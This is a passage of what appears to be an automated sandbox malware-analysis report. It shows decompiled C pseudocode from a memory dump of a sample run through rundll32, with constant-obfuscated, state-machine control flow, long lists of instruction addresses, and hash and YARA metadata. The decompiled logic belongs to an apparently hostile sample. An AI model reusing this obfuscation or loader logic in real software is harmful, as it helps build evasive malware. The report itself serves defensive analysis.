				_t810 = 0x4c;
				_v368 = _v368 * 0x4a;
				_v368 = _v368 ^ 0xfe46f3db;
				_v164 = 0xfa5634;
				_v164 = _v164 << 0xa;
				_v164 = _v164 ^ 0xe95805f5;
				_v172 = 0x9d86eb;
				_v172 = _v172 << 4;
				_v172 = _v172 ^ 0x09d75722;
				_v256 = 0x88ae25;
				_v256 = _v256 + 0xffff9888;
				_v256 = _v256 / _t810;
				_v256 = _v256 ^ 0x0006cec9;
				_v300 = 0x4e3cba;
				_v300 = _v300 ^ 0xaec86311;
				_v300 = _v300 >> 1;
				_v300 = _v300 ^ 0x574be554;
				_v156 = 0xcc8ccd;
				_v156 = _v156 ^ 0x818e95a6;
				_v156 = _v156 ^ 0x8149d9f5;
				_v124 = 0x282d8b;
				_t811 = 0x63;
				_v124 = _v124 / _t811;
				_v124 = _v124 ^ 0x0006a08e;
				_v356 = 0x703a6e;
				_v356 = _v356 << 0xf;
				_t812 = 0x17;
				_v356 = _v356 / _t812;
				_v356 = _v356 * 0x47;
				_v356 = _v356 ^ 0x5a27ab7c;
				_v184 = 0xabb004;
				_v184 = _v184 * 0x62;
				_v184 = _v184 ^ 0x41bb11d7;
				_v412 = 0xb8c7ed;
				_v412 = _v412 * 0x62;
				_v412 = _v412 + 0xffff10d9;
				_v412 = _v412 * 0x19;
				_v412 = _v412 ^ 0xe85860ff;
				_v264 = 0x94e0d2;
				_v264 = _v264 + 0xffffdaee;
				_v264 = _v264 | 0xae8d85da;
				_v264 = _v264 ^ 0xae9ce3c7;
				_v316 = 0xd1b765;
				_v316 = _v316 * 0x77;
				_v316 = _v316 + 0xe12c;
				_v316 = _v316 + 0x9f51;
				_v316 = _v316 ^ 0x617dce52;
				_v144 = 0xce6b76;
				_v144 = _v144 | 0xba09f1aa;
				_v144 = _v144 ^ 0xbac3e068;
				_v404 = 0x63322a;
				_v404 = _v404 ^ 0x9f0f399b;
				_v404 = _v404 * 0x4e;
				_v404 = _v404 * 0x4a;
				_v404 = _v404 ^ 0x78104cb3;
				_v216 = 0xd594b2;
				_v216 = _v216 + 0xf571;
				_v216 = _v216 ^ 0x00d5cf76;
				_v116 = 0xef919a;
				_v116 = _v116 << 0xd;
				_v116 = _v116 ^ 0xf23180e8;
				_v348 = 0xce0390;
				_v348 = _v348 + 0xffffa675;
				_v348 = _v348 + 0xffff84a1;
				_v348 = _v348 ^ 0x00c1e2da;
				_v396 = 0x7df7ff;
				_v396 = _v396 | 0xfdfffbfc;
				_v396 = _v396 ^ 0xfdff4c22;
				_v320 = 0x9ca349;
				_v320 = _v320 + 0xc568;
				_t813 = 7;
				_v320 = _v320 * 0x74;
				_v320 = _v320 * 0x14;
				_v320 = _v320 ^ 0x928c2e40;
				_v232 = 0xd54f23;
				_v232 = _v232 ^ 0xe15f8e30;
				_v232 = _v232 >> 9;
				_v232 = _v232 ^ 0x0079ed07;
				_v328 = 0x9619e2;
				_v328 = _v328 >> 0xf;
				_v328 = _v328 + 0xffff55f8;
				_v328 = _v328 + 0x27fc;
				_v328 = _v328 ^ 0xfffb07bb;
				_v388 = 0xf5c662;
				_v388 = _v388 + 0xffff192d;
				_v388 = _v388 << 6;
				_v388 = _v388 ^ 0x81a7a751;
				_v388 = _v388 ^ 0xbc9807e7;
				_v200 = 0x8d276;
				_v200 = _v200 | 0x4d140240;
				_v200 = _v200 ^ 0x4d1b4a48;
				_v260 = 0x1bde30;
				_v260 = _v260 / _t813;
				_v260 = _v260 ^ 0x62b9a7e6;
				_v260 = _v260 ^ 0x62b42e65;
				_v148 = 0xa934f2;
				_v148 = _v148 | 0xd141041b;
				_v148 = _v148 ^ 0xd1e1ef22;
				_v336 = 0xd722ef;
				_v336 = _v336 ^ 0xf728ea61;
				_v336 = _v336 * 0x41;
				_v336 = _v336 + 0xdc3e;
				_v336 = _v336 ^ 0xf7ff9a03;
				_v344 = 0x7da9d7;
				_v344 = _v344 * 0x5b;
				_v344 = _v344 >> 5;
				_v344 = _v344 ^ 0xb332f6cb;
				_v344 = _v344 ^ 0xb251ceff;
				_v248 = 0xd93304;
				_v248 = _v248 << 5;
				_v248 = _v248 * 0xa;
				_v248 = _v248 ^ 0x0f7c3f5b;
				_v376 = 0xe01f7;
				_v376 = _v376 + 0xffff5834;
				_v376 = _v376 + 0xffff4130;
				_v376 = _v376 ^ 0xd27aacc5;
				_v376 = _v376 ^ 0xd2797cee;
				_v152 = 0x8f3686;
				_v152 = _v152 >> 0xc;
				_v152 = _v152 ^ 0x000cec01;
				_v384 = 0x1fccfd;
				_v384 = _v384 ^ 0xe361d411;
				_v384 = _v384 * 0x14;
				_v384 = _v384 + 0xb1de;
				_v384 = _v384 ^ 0xc5d6ed44;
				_v296 = 0x2c9c5a;
				_v296 = _v296 ^ 0xe8ab125b;
				_v296 = _v296 ^ 0x12f0c7da;
				_v296 = _v296 ^ 0xfa7b923a;
				_v304 = 0x37d359;
				_t903 = 0xcb9b74d;
				_v80 = 0x48;
				_v304 = _v304 * 0x7e;
				_v304 = _v304 | 0xb84966f9;
				_v304 = _v304 * 0x68;
				_v304 = _v304 ^ 0x2a2d9f44;
				_v140 = 0x53fc4;
				_v140 = _v140 ^ 0xe3b2dcd9;
				_v140 = _v140 ^ 0xe3b5fe0e;
				while(1) {
					L1:
					while(1) {
						L2:
						_t814 = 0xb5dc217;
						_t880 = 0xd2f1df;
						do {
							while(1) {
								L3:
								_t915 = _t796 - 0xb1829b2;
								if(_t915 > 0) {
									break;
								}
								if(_t915 == 0) {
									_push(_v372);
									_push(_v308);
									_push(0x2b15e8);
									_t775 = E002BAB66(_v364, _v244, __eflags);
									_push(_v176);
									_push(_v112);
									_push(0x2b1538);
									__eflags = E002C0EDA(E002BAB66(_v332, _v168, __eflags), _v120, _v416, _t775,  &_v100, _v252, _v276) - _v160;
									_t796 =  ==  ? 0xd2f1df : 0x4c92ee0;
									E002BAE03(_v400, _v408, _v268, _t775);
									E002BAE03(_v132, _v392, _v236, _t776);
									_t900 = _v84;
									_t908 = _t908 + 0x3c;
									goto L12;
								} else {
									if(_t796 == _t880) {
										_v88 = 0x100;
										_t784 = E002B5FE2(_v128, 0x100, _v228,  &_v104, _v284, _v380, _v100);
										_t908 = _t908 + 0x14;
										__eflags = _t784 - _v340;
										_t762 = 0x595c7f7;
										_t796 =  ==  ? 0x595c7f7 : 0x2464b44;
										goto L2;
									} else {
										if(_t796 == 0x2464b44) {
											E002B7027(_v304, _v312, _v100, _v140);
										} else {
											if(_t796 == _t762) {
												__eflags = E002CD76F(_v192, _v136, _v104, _v324) - _v108;
												_t796 =  ==  ? _t903 : 0xd356110;
												while(1) {
													L1:
													goto L2;
												}
											} else {
												if(_t796 == 0x60e8fa3) {
													_t796 = 0xb1829b2;
													continue;
												} else {
													if(_t796 == 0x6aa287e) {
														E002CE884(_v388, _v200, _v260, _v92);
														_t796 = 0xbb8b89b;
														while(1) {
															L1:
															L2:
															_t814 = 0xb5dc217;
															_t880 = 0xd2f1df;
															goto L3;
														}
													} else {
														_t921 = _t796 - 0x873eae2;
														if(_t796 == 0x873eae2) {
															_push(_v412);
															_push(_v184);
															_push(0x2b1588);
															E002CF9E2(_v292, _v264, _v100,  *_t900, _v316, _v124, _v144,  *((intOrPtr*)(_t900 + 4)), _v404, _v216, E002BAB66(_v124, _v356, _t921),  &_v96);
															_t796 =  ==  ? 0xb5dc217 : 0xd356110;
															E002BAE03(_v116, _v348, _v396, _t790);
															_t908 = _t908 + 0x3c;
															L12:
															_t903 = 0xcb9b74d;
															L33:
															_t880 = 0xd2f1df;
															_t814 = 0xb5dc217;
															_t762 = 0x595c7f7;
														}
														goto L34;
													}
												}
											}
										}
									}
								}
								L37:
								return _t907;
							}
							__eflags = _t796 - _t814;
							if(_t796 == _t814) {
								_t761 = E002BF0A0(_v320, _v232, _v96, _v328,  &_v92, _v104, _v240);
								_t908 = _t908 + 0x14;
								__eflags = _t761;
								if(__eflags != 0) {
									_t796 = 0xbb8b89b;
									goto L33;
								} else {
									_t796 = 0xc32131f;
									goto L1;
								}
							} else {
								__eflags = _t796 - 0xbb8b89b;
								if(_t796 == 0xbb8b89b) {
									E002C4E64(_v148, _v336, _v96, _v344, _v248);
									_t908 = _t908 + 0xc;
									_t796 = 0xd356110;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									__eflags = _t796 - 0xc32131f;
									if(_t796 == 0xc32131f) {
										_t764 = E002BCFCE(_v92);
										_t796 = 0x6aa287e;
										__eflags = _t764;
										_t907 =  !=  ? 1 : _t907;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										__eflags = _t796 - _t903;
										if(__eflags == 0) {
											_push(_v224);
											_push(_v220);
											_push(0x2b1588);
											_t906 = E002BAB66(_v212, _v288, __eflags);
											_v88 = _v80;
											_t768 = E002B3E2A(_v352, _v180, _t765, _v80, _v360, _v188, _v196, _v204, _v104, _v280,  &_v88, _v80,  &_v76, _v368);
											_t908 = _t908 + 0x3c;
											__eflags = _t768 - _v272;
											if(_t768 != _v272) {
												_t796 = 0xd356110;
											} else {
												_t770 =  *0x2d5c9c; // 0x0
												E002CFD29( &_v68, _v164, _t770 + 0x10, _v172, 0x40);
												_t908 = _t908 + 0xc;
												_t796 = 0x873eae2;
											}
											E002BAE03(_v256, _v300, _v156, _t906);
											goto L12;
										} else {
											__eflags = _t796 - 0xd356110;
											if(__eflags != 0) {
												goto L34;
											} else {
												E002C4E64(_v376, _v152, _v104, _v384, _v296);
												_t908 = _t908 + 0xc;
												_t796 = 0x2464b44;
												while(1) {
													L1:
													goto L2;
												}
											}
										}
									}
								}
							}
							goto L37;
							L34:
						} while (_t796 != 0x4c92ee0);
						goto L37;
					}
				}
			}






















































































































                                                                                                                      0x002b9a83
                                                                                                                      0x002b9a9c
                                                                                                                      0x002b9aa3
                                                                                                                      0x002b9aa5
                                                                                                                      0x002b9ab0
                                                                                                                      0x002b9ab2
                                                                                                                      0x002b9abd
                                                                                                                      0x002b9ac2
                                                                                                                      0x002b9acd
                                                                                                                      0x002b9ad8
                                                                                                                      0x002b9ae3
                                                                                                                      0x002b9aee
                                                                                                                      0x002b9af9
                                                                                                                      0x002b9b01
                                                                                                                      0x002b9b10
                                                                                                                      0x002b9b11
                                                                                                                      0x002b9b18
                                                                                                                      0x002b9b24
                                                                                                                      0x002b9b28
                                                                                                                      0x002b9b30
                                                                                                                      0x002b9b3b
                                                                                                                      0x002b9b43
                                                                                                                      0x002b9b4a
                                                                                                                      0x002b9b55
                                                                                                                      0x002b9b60
                                                                                                                      0x002b9b6b
                                                                                                                      0x002b9b76
                                                                                                                      0x002b9b8a
                                                                                                                      0x002b9b91
                                                                                                                      0x002b9b9c
                                                                                                                      0x002b9ba7
                                                                                                                      0x002b9bb2
                                                                                                                      0x002b9bbd
                                                                                                                      0x002b9bc8
                                                                                                                      0x002b9bd3
                                                                                                                      0x002b9bde
                                                                                                                      0x002b9bf1
                                                                                                                      0x002b9bf8
                                                                                                                      0x002b9c03
                                                                                                                      0x002b9c0e
                                                                                                                      0x002b9c16
                                                                                                                      0x002b9c21
                                                                                                                      0x002b9c34
                                                                                                                      0x002b9c3b
                                                                                                                      0x002b9c46
                                                                                                                      0x002b9c51
                                                                                                                      0x002b9c59
                                                                                                                      0x002b9c61
                                                                                                                      0x002b9c66
                                                                                                                      0x002b9c6e
                                                                                                                      0x002b9c76
                                                                                                                      0x002b9c7e
                                                                                                                      0x002b9c86
                                                                                                                      0x002b9c8e
                                                                                                                      0x002b9c93
                                                                                                                      0x002b9c9b
                                                                                                                      0x002b9ca6
                                                                                                                      0x002b9cae
                                                                                                                      0x002b9cb9
                                                                                                                      0x002b9cc4
                                                                                                                      0x002b9ccf
                                                                                                                      0x002b9cd6
                                                                                                                      0x002b9cde
                                                                                                                      0x002b9ce9
                                                                                                                      0x002b9cf4
                                                                                                                      0x002b9cfc
                                                                                                                      0x002b9d01
                                                                                                                      0x002b9d0f
                                                                                                                      0x002b9d12
                                                                                                                      0x002b9d13
                                                                                                                      0x002b9d17
                                                                                                                      0x002b9d1f
                                                                                                                      0x002b9d27
                                                                                                                      0x002b9d2c
                                                                                                                      0x002b9d34
                                                                                                                      0x002b9d39
                                                                                                                      0x002b9d41
                                                                                                                      0x002b9d4c
                                                                                                                      0x002b9d54
                                                                                                                      0x002b9d5f
                                                                                                                      0x002b9d75
                                                                                                                      0x002b9d7c
                                                                                                                      0x002b9d87
                                                                                                                      0x002b9d92
                                                                                                                      0x002b9d9d
                                                                                                                      0x002b9da8
                                                                                                                      0x002b9db0
                                                                                                                      0x002b9dc0
                                                                                                                      0x002b9dc6
                                                                                                                      0x002b9dce
                                                                                                                      0x002b9dd6
                                                                                                                      0x002b9de1
                                                                                                                      0x002b9df3
                                                                                                                      0x002b9df8
                                                                                                                      0x002b9e01
                                                                                                                      0x002b9e0c
                                                                                                                      0x002b9e17
                                                                                                                      0x002b9e22
                                                                                                                      0x002b9e2d
                                                                                                                      0x002b9e38
                                                                                                                      0x002b9e40
                                                                                                                      0x002b9e45
                                                                                                                      0x002b9e4d
                                                                                                                      0x002b9e55
                                                                                                                      0x002b9e5d
                                                                                                                      0x002b9e65
                                                                                                                      0x002b9e6d
                                                                                                                      0x002b9e76
                                                                                                                      0x002b9e7b
                                                                                                                      0x002b9e81
                                                                                                                      0x002b9e89
                                                                                                                      0x002b9e9c
                                                                                                                      0x002b9e9d
                                                                                                                      0x002b9ea4
                                                                                                                      0x002b9eaf
                                                                                                                      0x002b9eba
                                                                                                                      0x002b9ec5
                                                                                                                      0x002b9ed0
                                                                                                                      0x002b9edb
                                                                                                                      0x002b9ee3
                                                                                                                      0x002b9eed
                                                                                                                      0x002b9ef7
                                                                                                                      0x002b9efb
                                                                                                                      0x002b9f03
                                                                                                                      0x002b9f19
                                                                                                                      0x002b9f1e
                                                                                                                      0x002b9f25
                                                                                                                      0x002b9f30
                                                                                                                      0x002b9f3b
                                                                                                                      0x002b9f46
                                                                                                                      0x002b9f4e
                                                                                                                      0x002b9f59
                                                                                                                      0x002b9f64
                                                                                                                      0x002b9f6c
                                                                                                                      0x002b9f77
                                                                                                                      0x002b9f82
                                                                                                                      0x002b9f8a
                                                                                                                      0x002b9f98
                                                                                                                      0x002b9f9d
                                                                                                                      0x002b9fa1
                                                                                                                      0x002b9fa9
                                                                                                                      0x002b9fb1
                                                                                                                      0x002b9fbc
                                                                                                                      0x002b9fc7
                                                                                                                      0x002b9fd2
                                                                                                                      0x002b9fe0
                                                                                                                      0x002b9fe5
                                                                                                                      0x002b9fe9
                                                                                                                      0x002b9ff4
                                                                                                                      0x002b9ff8
                                                                                                                      0x002ba000
                                                                                                                      0x002ba00b
                                                                                                                      0x002ba013
                                                                                                                      0x002ba01e
                                                                                                                      0x002ba029
                                                                                                                      0x002ba034
                                                                                                                      0x002ba03f
                                                                                                                      0x002ba04a
                                                                                                                      0x002ba055
                                                                                                                      0x002ba060
                                                                                                                      0x002ba06b
                                                                                                                      0x002ba076
                                                                                                                      0x002ba081
                                                                                                                      0x002ba08c
                                                                                                                      0x002ba094
                                                                                                                      0x002ba0a1
                                                                                                                      0x002ba0a5
                                                                                                                      0x002ba0ad
                                                                                                                      0x002ba0b5
                                                                                                                      0x002ba0c0
                                                                                                                      0x002ba0c8
                                                                                                                      0x002ba0d3
                                                                                                                      0x002ba0db
                                                                                                                      0x002ba0e0
                                                                                                                      0x002ba0e5
                                                                                                                      0x002ba0ed
                                                                                                                      0x002ba0f5
                                                                                                                      0x002ba100
                                                                                                                      0x002ba10b
                                                                                                                      0x002ba116
                                                                                                                      0x002ba121
                                                                                                                      0x002ba12c
                                                                                                                      0x002ba137
                                                                                                                      0x002ba142
                                                                                                                      0x002ba14d
                                                                                                                      0x002ba158
                                                                                                                      0x002ba160
                                                                                                                      0x002ba16d
                                                                                                                      0x002ba17a
                                                                                                                      0x002ba17d
                                                                                                                      0x002ba181
                                                                                                                      0x002ba189
                                                                                                                      0x002ba194
                                                                                                                      0x002ba19c
                                                                                                                      0x002ba1a7
                                                                                                                      0x002ba1b2
                                                                                                                      0x002ba1ba
                                                                                                                      0x002ba1c5
                                                                                                                      0x002ba1d0
                                                                                                                      0x002ba1e6
                                                                                                                      0x002ba1ed
                                                                                                                      0x002ba1f8
                                                                                                                      0x002ba203
                                                                                                                      0x002ba20e
                                                                                                                      0x002ba215
                                                                                                                      0x002ba220
                                                                                                                      0x002ba22b
                                                                                                                      0x002ba236
                                                                                                                      0x002ba241
                                                                                                                      0x002ba253
                                                                                                                      0x002ba258
                                                                                                                      0x002ba261
                                                                                                                      0x002ba26c
                                                                                                                      0x002ba274
                                                                                                                      0x002ba27d
                                                                                                                      0x002ba280
                                                                                                                      0x002ba289
                                                                                                                      0x002ba28d
                                                                                                                      0x002ba295
                                                                                                                      0x002ba2a8
                                                                                                                      0x002ba2af
                                                                                                                      0x002ba2ba
                                                                                                                      0x002ba2c7
                                                                                                                      0x002ba2cb
                                                                                                                      0x002ba2d8
                                                                                                                      0x002ba2dc
                                                                                                                      0x002ba2e4
                                                                                                                      0x002ba2ef
                                                                                                                      0x002ba2fa
                                                                                                                      0x002ba305
                                                                                                                      0x002ba310
                                                                                                                      0x002ba31d
                                                                                                                      0x002ba321
                                                                                                                      0x002ba329
                                                                                                                      0x002ba331
                                                                                                                      0x002ba339
                                                                                                                      0x002ba344
                                                                                                                      0x002ba34f
                                                                                                                      0x002ba35a
                                                                                                                      0x002ba362
                                                                                                                      0x002ba36f
                                                                                                                      0x002ba378
                                                                                                                      0x002ba37c
                                                                                                                      0x002ba384
                                                                                                                      0x002ba38f
                                                                                                                      0x002ba39a
                                                                                                                      0x002ba3a5
                                                                                                                      0x002ba3b0
                                                                                                                      0x002ba3b8
                                                                                                                      0x002ba3c3
                                                                                                                      0x002ba3cd
                                                                                                                      0x002ba3d5
                                                                                                                      0x002ba3e5
                                                                                                                      0x002ba3ed
                                                                                                                      0x002ba3f5
                                                                                                                      0x002ba3fd
                                                                                                                      0x002ba405
                                                                                                                      0x002ba40d
                                                                                                                      0x002ba41c
                                                                                                                      0x002ba41d
                                                                                                                      0x002ba426
                                                                                                                      0x002ba42a
                                                                                                                      0x002ba432
                                                                                                                      0x002ba43d
                                                                                                                      0x002ba448
                                                                                                                      0x002ba450
                                                                                                                      0x002ba45b
                                                                                                                      0x002ba463
                                                                                                                      0x002ba468
                                                                                                                      0x002ba470
                                                                                                                      0x002ba478
                                                                                                                      0x002ba480
                                                                                                                      0x002ba488
                                                                                                                      0x002ba490
                                                                                                                      0x002ba495
                                                                                                                      0x002ba49d
                                                                                                                      0x002ba4a5
                                                                                                                      0x002ba4b0
                                                                                                                      0x002ba4bb
                                                                                                                      0x002ba4c6
                                                                                                                      0x002ba4da
                                                                                                                      0x002ba4e1
                                                                                                                      0x002ba4ec
                                                                                                                      0x002ba4f7
                                                                                                                      0x002ba502
                                                                                                                      0x002ba50d
                                                                                                                      0x002ba518
                                                                                                                      0x002ba520
                                                                                                                      0x002ba52d
                                                                                                                      0x002ba531
                                                                                                                      0x002ba539
                                                                                                                      0x002ba541
                                                                                                                      0x002ba54e
                                                                                                                      0x002ba552
                                                                                                                      0x002ba557
                                                                                                                      0x002ba55f
                                                                                                                      0x002ba567
                                                                                                                      0x002ba572
                                                                                                                      0x002ba582
                                                                                                                      0x002ba589
                                                                                                                      0x002ba594
                                                                                                                      0x002ba59c
                                                                                                                      0x002ba5a4
                                                                                                                      0x002ba5ac
                                                                                                                      0x002ba5b4
                                                                                                                      0x002ba5bc
                                                                                                                      0x002ba5c7
                                                                                                                      0x002ba5cf
                                                                                                                      0x002ba5da
                                                                                                                      0x002ba5e2
                                                                                                                      0x002ba5ef
                                                                                                                      0x002ba5f3
                                                                                                                      0x002ba5fb
                                                                                                                      0x002ba603
                                                                                                                      0x002ba60e
                                                                                                                      0x002ba619
                                                                                                                      0x002ba624
                                                                                                                      0x002ba62f
                                                                                                                      0x002ba642
                                                                                                                      0x002ba647
                                                                                                                      0x002ba652
                                                                                                                      0x002ba659
                                                                                                                      0x002ba66c
                                                                                                                      0x002ba673
                                                                                                                      0x002ba67e
                                                                                                                      0x002ba689
                                                                                                                      0x002ba694
                                                                                                                      0x002ba69f
                                                                                                                      0x002ba69f
                                                                                                                      0x002ba6a4
                                                                                                                      0x002ba6a4
                                                                                                                      0x002ba6a4
                                                                                                                      0x002ba6a9
                                                                                                                      0x002ba6ae
                                                                                                                      0x002ba6ae
                                                                                                                      0x002ba6ae
                                                                                                                      0x002ba6ae
                                                                                                                      0x002ba6b4
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002ba6ba
                                                                                                                      0x002ba86a
                                                                                                                      0x002ba86e
                                                                                                                      0x002ba880
                                                                                                                      0x002ba885
                                                                                                                      0x002ba88f
                                                                                                                      0x002ba896
                                                                                                                      0x002ba8a8
                                                                                                                      0x002ba8f1
                                                                                                                      0x002ba904
                                                                                                                      0x002ba90b
                                                                                                                      0x002ba923
                                                                                                                      0x002ba928
                                                                                                                      0x002ba92f
                                                                                                                      0x00000000
                                                                                                                      0x002ba6c0
                                                                                                                      0x002ba6c2
                                                                                                                      0x002ba81e
                                                                                                                      0x002ba848
                                                                                                                      0x002ba84f
                                                                                                                      0x002ba85b
                                                                                                                      0x002ba85d
                                                                                                                      0x002ba862
                                                                                                                      0x00000000
                                                                                                                      0x002ba6c8
                                                                                                                      0x002ba6ce
                                                                                                                      0x002bab52
                                                                                                                      0x002ba6d4
                                                                                                                      0x002ba6d6
                                                                                                                      0x002ba806
                                                                                                                      0x002ba808
                                                                                                                      0x002ba69f
                                                                                                                      0x002ba69f
                                                                                                                      0x00000000
                                                                                                                      0x002ba69f
                                                                                                                      0x002ba6dc
                                                                                                                      0x002ba6e2
                                                                                                                      0x002ba7ce
                                                                                                                      0x00000000
                                                                                                                      0x002ba6e8
                                                                                                                      0x002ba6ee
                                                                                                                      0x002ba7bd
                                                                                                                      0x002ba7c4
                                                                                                                      0x002ba69f
                                                                                                                      0x002ba69f
                                                                                                                      0x002ba6a4
                                                                                                                      0x002ba6a4
                                                                                                                      0x002ba6a9
                                                                                                                      0x00000000
                                                                                                                      0x002ba6a9
                                                                                                                      0x002ba6f4
                                                                                                                      0x002ba6f4
                                                                                                                      0x002ba6fa
                                                                                                                      0x002ba700
                                                                                                                      0x002ba704
                                                                                                                      0x002ba716
                                                                                                                      0x002ba762
                                                                                                                      0x002ba78f
                                                                                                                      0x002ba792
                                                                                                                      0x002ba797
                                                                                                                      0x002ba79a
                                                                                                                      0x002ba79a
                                                                                                                      0x002bab19
                                                                                                                      0x002bab19
                                                                                                                      0x002bab1e
                                                                                                                      0x002bab23
                                                                                                                      0x002bab23
                                                                                                                      0x00000000
                                                                                                                      0x002ba6fa
                                                                                                                      0x002ba6ee
                                                                                                                      0x002ba6e2
                                                                                                                      0x002ba6d6
                                                                                                                      0x002ba6ce
                                                                                                                      0x002ba6c2
                                                                                                                      0x002bab5b
                                                                                                                      0x002bab65
                                                                                                                      0x002bab65
                                                                                                                      0x002ba937
                                                                                                                      0x002ba939
                                                                                                                      0x002baafe
                                                                                                                      0x002bab03
                                                                                                                      0x002bab06
                                                                                                                      0x002bab08
                                                                                                                      0x002bab14
                                                                                                                      0x00000000
                                                                                                                      0x002bab0a
                                                                                                                      0x002bab0a
                                                                                                                      0x00000000
                                                                                                                      0x002bab0a
                                                                                                                      0x002ba93f
                                                                                                                      0x002ba93f
                                                                                                                      0x002ba945
                                                                                                                      0x002baabd
                                                                                                                      0x002baac2
                                                                                                                      0x002baac5
                                                                                                                      0x002ba69f
                                                                                                                      0x002ba69f
                                                                                                                      0x00000000
                                                                                                                      0x002ba69f
                                                                                                                      0x002ba94b
                                                                                                                      0x002ba94b
                                                                                                                      0x002ba951
                                                                                                                      0x002baa89
                                                                                                                      0x002baa90
                                                                                                                      0x002baa96
                                                                                                                      0x002baa98
                                                                                                                      0x002ba69f
                                                                                                                      0x002ba69f
                                                                                                                      0x00000000
                                                                                                                      0x002ba69f
                                                                                                                      0x002ba957
                                                                                                                      0x002ba957
                                                                                                                      0x002ba959
                                                                                                                      0x002ba996
                                                                                                                      0x002ba99d
                                                                                                                      0x002ba9b2
                                                                                                                      0x002ba9c6
                                                                                                                      0x002ba9c8
                                                                                                                      0x002baa1b
                                                                                                                      0x002baa20
                                                                                                                      0x002baa23
                                                                                                                      0x002baa2a
                                                                                                                      0x002baa5b
                                                                                                                      0x002baa2c
                                                                                                                      0x002baa35
                                                                                                                      0x002baa4c
                                                                                                                      0x002baa51
                                                                                                                      0x002baa54
                                                                                                                      0x002baa54
                                                                                                                      0x002baa76
                                                                                                                      0x00000000
                                                                                                                      0x002ba95b
                                                                                                                      0x002ba95b
                                                                                                                      0x002ba961
                                                                                                                      0x00000000
                                                                                                                      0x002ba967
                                                                                                                      0x002ba984
                                                                                                                      0x002ba989
                                                                                                                      0x002ba98c
                                                                                                                      0x002ba69f
                                                                                                                      0x002ba69f
                                                                                                                      0x00000000
                                                                                                                      0x002ba69f
                                                                                                                      0x002ba69f
                                                                                                                      0x002ba961
                                                                                                                      0x002ba959
                                                                                                                      0x002ba951
                                                                                                                      0x002ba945
                                                                                                                      0x00000000
                                                                                                                      0x002bab28
                                                                                                                      0x002bab28
                                                                                                                      0x00000000
                                                                                                                      0x002bab34
                                                                                                                      0x002ba6a4

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *2c$,$0L4$Api$G=$$H$R\$TKW$a=$n:p$pZy$zR-$4r
                                                                                                                      • API String ID: 0-1682715903
                                                                                                                      • Opcode ID: 5e9b78d41a2773c66c65c1a82b0859679c701fa080d3b1951832dc9f85408f70
                                                                                                                      • Instruction ID: 310d67ef8c72a16b737cf73e4875e58ca1884eefe201f94bcc683c1696df1bf5
                                                                                                                      • Opcode Fuzzy Hash: 5e9b78d41a2773c66c65c1a82b0859679c701fa080d3b1951832dc9f85408f70
                                                                                                                      • Instruction Fuzzy Hash: EB82FE71508381CBD379CF65C58AA8BBBE2BBC4348F10891DE2DA86260D7B58959CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C6864 Relevance: 16.8, Strings: 13, Instructions: 566COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E002C6864(char __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				signed int _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				unsigned int _v380;
				unsigned int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				unsigned int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				char _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				unsigned int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _t574;
				signed int _t578;
				signed int _t583;
				void* _t604;
				void* _t614;
				signed int _t616;
				int _t621;
				signed int _t623;
				signed int _t624;
				signed int _t628;
				intOrPtr* _t633;
				void* _t636;
				void* _t637;
				void* _t638;
				signed int _t654;
				void* _t686;
				void* _t687;
				signed int _t689;
				signed int _t703;
				signed int _t704;
				signed int _t705;
				signed int _t706;
				signed int _t707;
				signed int _t708;
				signed int _t709;
				signed int _t710;
				signed int _t711;
				signed int _t712;
				signed int _t713;
				signed int _t714;
				signed int _t715;
				void* _t719;
				void* _t722;
				void* _t723;
				void* _t724;
				signed int _t729;
				signed int* _t730;
				void* _t736;

				_t730 =  &_v536;
				_v312 = __edx;
				_v488 = __ecx;
				_v292 = _v292 & 0x00000000;
				_v304 = 0xafedb;
				_v300 = 0x161b15;
				_v296 = 0xc4991c;
				_v520 = 0x229c01;
				_v520 = _v520 * 0x5c;
				_t723 = 0xff9e75d;
				_v520 = _v520 + 0xffff9f66;
				_t703 = 0xc;
				_v520 = _v520 / _t703;
				_v520 = _v520 ^ 0x01094ea5;
				_v532 = 0xceed0e;
				_v532 = _v532 << 3;
				_v532 = _v532 | 0xe74d27fb;
				_v532 = _v532 ^ 0xe772d72f;
				_v476 = 0xc446fa;
				_v476 = _v476 + 0xf6e0;
				_v476 = _v476 + 0x4782;
				_v476 = _v476 + 0xffffecbc;
				_v476 = _v476 ^ 0x00cc0886;
				_v336 = 0x190970;
				_t704 = 0x2e;
				_v336 = _v336 * 0x68;
